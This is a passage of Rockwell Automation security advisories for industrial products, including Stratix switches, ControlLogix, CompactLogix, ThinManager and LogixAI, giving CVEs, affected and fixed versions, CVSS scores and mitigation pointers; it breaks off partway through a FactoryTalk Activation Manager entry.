ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1750 | Lifecycle Services Vulnerable to Cisco CVE-2025-20352

Published Date:

October 02, 2025

Last Updated:

October 02, 2025

CVE IDs:

CVE-2025-20352

CVSS Scores (v3.1):

7.7

CVSS Scores (v4.0):

6.3

Revision Number:

1.0

Known Exploited Vulnerability (KEV):

Yes

Corrected:

Yes

Workaround:

Yes

More Details Less Details

Lifecycle Services Vulnerable to Cisco CVE-2025-20352

Affected products and solution

Affected Product	Affected Software Version	Corrected in Software Version
Industrial Data Center (IDC) with Cisco Switching	Generations 1 – 5	Use Cisco version checker to determine fixed version to download
IDC-Managed Support contract with Cisco Switching	Generations 1 – 5	Use Cisco version checker to determine fixed version to download
Network-Managed Support contract with Cisco network switch	All	Use Cisco version checker to determine fixed version to download
Firewall-Managed Support contract with Cisco firewall	All	Use Cisco version checker to determine fixed version to download

Security Issue Details

Category	Details
CVE ID	CVE-2025-20352
Impact	A third-party vulnerability exists in the affected products. The affected products use Cisco IOS XE Software which contains a vulnerability in the Simple Network Management Protocol (SNMP) subsystem. An authenticated, remote attacker with low privileges could cause a denial of service (DoS) condition on an affected device that is running Cisco IOS Software or Cisco IOS XE Software. To cause the DoS, the attacker must have the SNMPv2c or earlier read-only community string or valid SNMPv3 user credentials. An authenticated, remote attacker with high privileges could execute code as the root user on an affected device that is running Cisco IOS XE Software. To execute code as the root user, the attacker must have the SNMPv1 or v2c read-only community string or valid SNMPv3 user credentials and administrative or privilege 15 credentials on the affected device. An attacker could exploit this vulnerability by sending a crafted SNMP packet to an affected device over IPv4 or IPv6 networks. This vulnerability is due to a stack overflow condition in the SNMP subsystem of the affected software. A successful exploit could allow a low-privileged attacker to cause the affected system to reload, resulting in a DoS condition, or allow a high-privileged attacker to execute arbitrary code as the root user and obtain full control of the affected system. Note: This vulnerability affects all versions of SNMP.
CVSS 3.1 Base Score	7.7/10
CVSS 4.0 Base Score	6.3/10
CWEs	CWE-121: Stack-based Buffer Overflow
Known Exploited Vulnerability	Yes (Listed in KEV Database)

Mitigations and Workarounds

Users with an active Rockwell Automation Infrastructure Managed Service contract:

Contact Rockwell Automation to discuss actions needed for remediation efforts.

Users without Rockwell Automation managed services contract, refer to Cisco’s workarounds below:

· Cisco’s Workarounds

Additionally, users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.

· Security Best Practices

Revision History

Revision	Date	Description
1.0	10/2/2025	Initial release

Glossary

Simple Network Management Protocol (SNMP): Used for collecting and organizing information about managed devices on IP.
Stack overflow: A runtime error that occurs when a program uses more stack memory than is available, typically due to excessive or infinite recursion or deeply nested function calls.
Denial of Service (DoS): A malicious attempt to disrupt the normal functioning of a targeted server, service, or network by overwhelming it with a flood of traffic or triggering a crash.
Cisco IOS (Internetwork Operating System): Proprietary software used on most Cisco routers and switches, providing the command-line interface and network services necessary for configuring, managing, and operating Cisco networking devices.
Cisco IOS XE: A modern, modular operating system built on a Linux kernel that powers Cisco enterprise networking devices, offering enhanced programmability, security, and scalability while maintaining compatibility with traditional IOS command-line interfaces..

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

Subscribe to product security alerts
Review the current list of Rockwell Automation security advisories
Report a possible security issue in a Rockwell Automation product
Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1749 | Stratix® Impact to Cisco CVE-2025-20352

Published Date:

September 26, 2025

Last Updated:

September 26, 2025

CVE IDs:

CVE-2025-20352

Products:

Stratix

CVSS Scores (v3.1):

7.7

CVSS Scores (v4.0):

6.3

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Product Description

Rockwell Automation Stratix® devices are industrial Ethernet switches and network infrastructure components designed for rugged environments, offering managed and unmanaged options with integrated support for EtherNet/IP™, optimized configuration through Studio 5000®.

Affected products and solution

Affected Product	CVE	Affected Software Version	Corrected in Software Version
Stratix® 5700, Stratix® 5400, Statix 5410	CVE-2025-20352	Up to v15.2(8)E7	Expected October 2025
Stratix® 5200/ 5800	CVE-2025-20352	Up to v17.17.01	Expected March 2026

Security Issue Details

Category	Details
CVE ID	CVE-2025-20352
Impact	A third-party vulnerability exists in the affected products. The affected products use Cisco IOS XE Software which contains a vulnerability in the Simple Network Management Protocol (SNMP) subsystem. An authenticated, remote attacker with low privileges could cause a denial of service (DoS) condition on an affected device that is running Cisco IOS Software or Cisco IOS XE Software. To cause the DoS, the attacker must have the SNMPv2c or earlier read-only community string or valid SNMPv3 user credentials. An authenticated, remote attacker with high privileges could execute code as the root user on an affected device that is running Cisco IOS XE Software. To execute code as the root user, the attacker must have the SNMPv1 or v2c read-only community string or valid SNMPv3 user credentials and administrative or privilege 15 credentials on the affected device. An attacker could exploit this vulnerability by sending a crafted SNMP packet to an affected device over IPv4 or IPv6 networks. This vulnerability is due to a stack overflow condition in the SNMP subsystem of the affected software. A successful exploit could allow a low-privileged attacker to cause the affected system to reload, resulting in a DoS condition, or allow a high-privileged attacker to execute arbitrary code as the root user and obtain full control of the affected system. Note: This vulnerability affects all versions of SNMP.
CVSS 3.1 Base Score	7.7/10
CVSS 4.0 Base Score	6.3/10
CWEs	CWE-121: Stack-based Buffer Overflow
Known Exploited Vulnerability	No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected Stratix® software should see the workarounds section from Cisco and our security best practices.

Revision History

Revision	Date	Description
1.0	9/26/2025	Initial release

Glossary

Simple Network Management Protocol (SNMP): Used for collecting and organizing information about managed devices on IP.
Stack overflow: A runtime error that occurs when a program uses more stack memory than is available, typically due to excessive or infinite recursion or deeply nested function calls.
Denial of Service (DoS): A malicious attempt to disrupt the normal functioning of a targeted server, service, or network by overwhelming it with a flood of traffic or triggering a crash.
Cisco IOS (Internetwork Operating System): Proprietary software used on most Cisco routers and switches, providing the command-line interface and network services necessary for configuring, managing, and operating Cisco networking devices.
·Cisco IOS XE: A modern, modular operating system built on a Linux kernel that powers Cisco enterprise networking devices, offering enhanced programmability, security, and scalability while maintaining compatibility with traditional IOS command-line interfaces.

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

Subscribe to product security alerts
Review the current list of Rockwell Automation security advisories
Report a possible security issue in a Rockwell Automation product
Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1748 | FactoryTalk® Analytics™ LogixAI® Exposed Redis DB

Published Date:

September 09, 2025

Last Updated:

September 09, 2025

CVE IDs:

CVE-2025-9364

Products:

FactoryTalk® Analytics™ LogixAI® 

CVSS Scores (v3.1):

8.8

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

FactoryTalk® Analytics™ LogixAI® from Rockwell Automation is an embedded machine learning solution that enables control engineers to deploy predictive models directly within Logix controllers.

Affected products and solution

Affected Product	CVE	Affected Software Version	Corrected in Software Version
FactoryTalk® Analytics™ LogixAI®	CVE-2025-9364	Versions 3.00 and 3.01	Version 3.02 and later

Security Issue Details

Category	Details
CVE ID	CVE-2025-9364
Impact	An open database issue exists in the affected product and version. The security issue stems from an over permissive Redis instance. This could result in an attacker on the intranet accessing sensitive data and potential alteration of data.
CVSS 3.1 Base Score	8.8/10
CVSS 4.0 Base Score	8.7/10
CWEs	CWE-497: Exposure of Sensitive System Information to an Unauthorized Control Sphere
Known Exploited Vulnerability	No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision	Date	Description
1.0	September 9, 2025	Initial release

Glossary   

· Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited   

· Redis Database: is an open-source, in-memory data structure store used as a database, cache, and message broker. It supports various data types like strings, hashes, lists, sets, and more, and is known for its high performance, low latency, and simplicity.

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

Subscribe to product security alerts
Review the current list of Rockwell Automation security advisories
Report a possible security issue in a Rockwell Automation product
Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1747 | ControlLogix® 5580 V35.013 Denial-Of-Service 

Published Date:

September 09, 2025

Last Updated:

September 09, 2025

CVE IDs:

CVE-2025-9166

Products:

ControlLogix® 5580

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.2

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

The ControlLogix® 5580 controller from Rockwell Automation delivers high-speed, multi-discipline control for discrete, motion, process, and safety applications, featuring enhanced security, integrated motion over EtherNet/IP.

Affected products and solution

Affected Product 

CVE 

Affected Software Version 

Corrected in Software Version 

Affected Catalog Numbers

ControlLogix® 5580

CVE-2025-9166

Version 35.013

Version 35.014 and later

Bulletin 1756

Security Issue Details

Category	Details
CVE ID	CVE-2025-9166
Impact	A denial-of-service security issue exists in the affected product and version. The security issue stems from the controller repeatedly attempting to forward messages. The issue could result in a major nonrecoverable fault on the controller.
CVSS 3.1 Base Score	7.5/10
CVSS 4.0 Base Score	8.2/10
CWEs	CWE-476: NULL Pointer Dereference
Known Exploited Vulnerability	No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision	Date	Description
1.0	September 9, 2025	Initial release

Glossary 

· Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited 

· Denial-of-Service (DoS): An attack that disrupts the normal functioning of a system, often by overwhelming it with requests. 

· Major Nonrecoverable Fault (MNRF): an error that occurs in a system or device and prevents it from recovering or functioning properly 

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

Subscribe to product security alerts
Review the current list of Rockwell Automation security advisories
Report a possible security issue in a Rockwell Automation product
Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1746 | CompactLogix® 5480 Code Execution Vulnerability 

Published Date:

September 09, 2025

Last Updated:

September 09, 2025

CVE IDs:

CVE-2025-9160 

Products:

CompactLogix® 5480

CVSS Scores (v3.1):

6.8

CVSS Scores (v4.0):

7.0

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

Yes

More Details Less Details

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

The CompactLogix® 5480 controller from Rockwell Automation is a high-performance, real-time controller that combines Logix control with Windows 10 IoT Enterprise.

Affected products and solution

Affected Product 

CVE 

Affected Software Version 

Corrected in Software Version 

Affected Catalog Numbers

CompactLogix® 5480

CVE-2025-9160

Version 32 - 37.011 w Windows package (2.1.0) Win10 v1607

N/A

5069-L430ERMW

5069-L450ERMW
5069-4100ERMW

5069-L4200ERMW 5069-L46ERMW

Security Issue Details

Category	Details
CVE ID	CVE-2025-9160
Impact	A code execution security issue exists in the affected product. An attacker with physical access could abuse the maintenance menu of the controller with a crafted payload. The security issue can result in arbitrary code execution.
CVSS 3.1 Base Score	6.8/10
CVSS 4.0 Base Score	7.0/10
CWEs	CWE-306: Missing Authentication for Critical Function
Known Exploited Vulnerability	No (Not listed in KEV database)

Mitigations and Workarounds
Best security practices should be applied.

Revision History

Revision	Date	Description
1.0	September 9, 2025	Initial release

Glossary 

· Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited 

· Arbitrary Code Execution: an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process 

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

Subscribe to product security alerts
Review the current list of Rockwell Automation security advisories
Report a possible security issue in a Rockwell Automation product
Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1745 | Stratix IOS CSRF to RCE Vulnerability

Published Date:

September 09, 2025

Last Updated:

September 05, 2025

CVE IDs:

CVE-2025-7350

Products:

Stratix IOS

CVSS Scores (v3.1):

9.6

CVSS Scores (v4.0):

8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Stratix® IOS Cross-Site Request Forgery to Code Execution Vulnerability

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

Product Description

Stratix® industrial Ethernet switches from Rockwell Automation provide high-performance network infrastructure optimized for industrial environments.

Affected products and solution

Affected Product

CVE

Affected Software Version

Corrected in Software Version

Affected Catalog Numbers

Stratix IOS

CVE-2025-7350

15.2(8)E5 and below

15.2(8)E6

Security Issue Details

Category	Details
CVE ID	CVE-2025-7350
Impact	A security issue affecting multiple Cisco devices also directly impacts Stratix® 5410, 5700, and 8000 devices. This can lead to remote code execution by uploading and running malicious configurations without authentication.
CVSS 3.1 Base Score	9.6/10
CVSS 4.0 Base Score	8.6/10
CWEs	CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Known Exploited Vulnerability	No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision	Date	Description
1.0	September 9, 2025	Initial release

Glossary

· Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

· Remote Code Execution: allows attackers to run arbitrary code on a remote machine, connecting to it over public or private networks

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

· Subscribe to product security alerts

· Review the current list of Rockwell Automation security advisories

· Report a possible security issue in a Rockwell Automation product

· Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1744 | 1783-NATR Memory Size Calculation Underflow Vulnerability

Published Date:

September 09, 2025

Last Updated:

September 05, 2025

CVE IDs:

CVE-2020-28895

Products:

1783-NATR

CVSS Scores (v3.1):

7.3

CVSS Scores (v4.0):

6.9

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

1783-NATR Memory Size Calculation Underflow Vulnerability

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments. Please note Rockwell Automation could not confirm whether this vulnerability is exploitable; however, we are disclosing it in the interest of full transparency and proactive communication.

Product Description

1783-NATR is a configurable NAT router that simplifies machine integration into plant-wide networks by enabling 1:1 IP address translation, supporting Device Level Ring and linear topologies, and allowing configuration via web interface or Studio 5000 Add-on Profile.

Affected products and solution

Affected Product	CVE	Affected Software Version	Corrected in Software Version	Affected Catalog Numbers
1783-NATR	CVE-2020-28895	All Versions Prior to 1.007	1.007	1783-NATR

Security Issue Details

Category	Details
CVE ID	CVE-2020-28895
Impact	In Wind River VxWorks, memory allocator has a possible overflow in calculating the memory block's size to be allocated by calloc(). As a result, the actual memory allocated is smaller than the buffer size specified by the arguments, leading to memory corruption.
CVSS 3.1 Base Score	7.3/10
CVSS 4.0 Base Score	6.9/10
CWEs	CWE-1103: Use of Platform-Dependent Third Party Components
Known Exploited Vulnerability	No (Not listed in KEV database)

Glossary:

· Wind River VxWorks: A trusted and widely deployed real-time operating system (RTOS) for mission-critical embedded systems. Used in all NATR modules.

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision	Date	Description
1.0	September 9, 2025	Initial release

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

· Subscribe to product security alerts

· Review the current list of Rockwell Automation security advisories

· Report a possible security issue in a Rockwell Automation product

· Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1743 | ThinManager SSRF Vulnerability

Published Date:

September 09, 2025

Last Updated:

September 05, 2025

CVE IDs:

CVE-2025-9065

Products:

ThinManager

CVSS Scores (v3.1):

7.2

CVSS Scores (v4.0):

8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

ThinManager® Server-Side Request Forgery Vulnerability

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

ThinManager is a centralized, secure thin client management software that delivers industrial visualization and application control across devices, helping optimize operations with scalable deployment and reduced IT overhead.

Affected products and solution

Affected Product	CVE	Affected Software Version	Corrected in Software Version	Affected Catalog Numbers
ThinManager®	CVE-2025-9065	13.0 - 14.0	14.1	9541*

Security Issue Details

Category	Details
CVE ID	CVE-2025-9065
Impact	A server-side request forgery security issue exists within Rockwell Automation ThinManager® software due to the lack of input sanitization. Authenticated attackers can exploit this vulnerability by specifying external SMB paths, exposing the ThinServer® service account NTLM hash.
CVSS 3.1 Base Score	7.2/10
CVSS 4.0 Base Score	8.6/10
CWEs	CWE-918: Server-Side Request Forgery (SSRF)
Known Exploited Vulnerability	No (Not listed in KEV database)

Glossary:

· SMB: Server Message Block, a protocol used for sharing files, printers, and other resources over a network

· NTLM: NT Lan Manager, a Windows authentication protocol

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices. Customers can also reference the following article from Microsoft to Block NTLM connections on SMB in Windows Server 2025.

Revision History

Revision	Date	Description
1.0	September 9, 2025	Initial release

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

· Subscribe to product security alerts

· Review the current list of Rockwell Automation security advisories

· Report a possible security issue in a Rockwell Automation product

· Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High

SD1741 | FactoryTalk Activation Manager Lack of Encryption Vulnerability

Published Date:

September 09, 2025

Last Updated:

September 04, 2025

CVE IDs:

CVE-2025-7970

Products:

FactoryTalk Activation Manager

CVSS Scores (v3.1):

7.1

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

FactoryTalk Activation Manager Lack of Encryption Vulnerability

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

FactoryTalk Activation Manager is a secure software tool that enables activation and management of Rockwell Automation products without physical media, using internet-based activation files and multiple licensing options.

Affected products and solution
